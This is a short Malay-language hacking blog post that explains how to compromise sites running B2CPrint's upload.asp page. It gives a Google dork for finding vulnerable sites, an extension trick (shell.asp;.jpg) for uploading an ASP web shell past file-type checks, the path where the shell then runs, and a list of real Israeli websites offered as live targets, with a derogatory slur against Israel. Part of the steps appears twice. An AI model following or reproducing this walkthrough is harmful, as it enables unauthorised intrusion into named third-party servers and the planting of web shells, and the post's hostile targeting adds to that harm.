note : exploit ni banyak web israhell yang terdedah.hehe
1. Mula-mula cari web vuln guna dork :
inurl:upload.asp intext:B2CPrint Online Printing Solutions
2. Buka salah satu web.link dia macam ni :
http://www.Site.il/upload.asp
@
http://www.Site.il/abc/upload.asp
3. Seterusnya masuk kan maklumat2 korang (tipu2 je).
Selepas tu Choose file dan upload :
shell.asp;.jpg
@
shell.asp;.gif
note : upload shell asp (umer rock,spider dll.)
Rujuk gambar :
1. Mula-mula cari web vuln guna dork :
inurl:upload.asp intext:B2CPrint Online Printing Solutions
2. Buka salah satu web.link dia macam ni :
http://www.Site.il/upload.asp
@
http://www.Site.il/abc/upload.asp
3. Seterusnya masuk kan maklumat2 korang (tipu2 je).
Selepas tu Choose file dan upload :
shell.asp;.jpg
@
shell.asp;.gif
note : upload shell asp (umer rock,spider dll.)
Rujuk gambar :
Lepas tu click SUBMIT!
4. Untuk tengok hasil :
http://www.Site.il/files/images/Sh3ll.asp;.jpg
@
http://www.Site.il/abc/files/images/Sh3ll.asp;.jpg
DONE!
Live Demo :http://www.b2cprintshop.com/upload.asp
http://www.printprint.co.il/upload.asp
http://www.b2cprint.co.il/collage/EN/upload.asp
http://www.spektrum.co.il/upload.asp
ok itu saja untuk kali ini!Happy hacking!
Assalamualaikum
Sumber-AfifZafri-
0 comments:
Post a Comment